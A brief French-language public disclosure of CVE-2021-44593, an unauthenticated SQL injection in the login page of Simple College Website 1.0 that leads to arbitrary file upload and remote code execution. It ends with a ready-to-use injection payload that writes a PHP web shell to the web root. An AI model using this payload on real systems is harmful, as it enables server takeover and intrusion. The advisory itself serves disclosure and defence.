
Divulgation publique et analyse de CVE-2021-44593, une injection SQL non authentifiée dans Simple College Website menant à un téléchargement arbitraire de fichiers et à une exécution de code à distance.
Divulgation publique de CVE-2021-44593. Une vulnérabilité d'injection SQL/téléversement arbitraire de fichiers/exécution de code à distance dans Simple College Website.
Simple College Website 1.0 est vulnérable à une injection SQL non authentifiée basée sur UNION dans le paramètre « username » de la page /admin/login.php, qui peut ensuite être exploitée pour téléverser des fichiers arbitraires et obtenir une exécution de code à distance.
La fonction login() dans admin_class.php
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -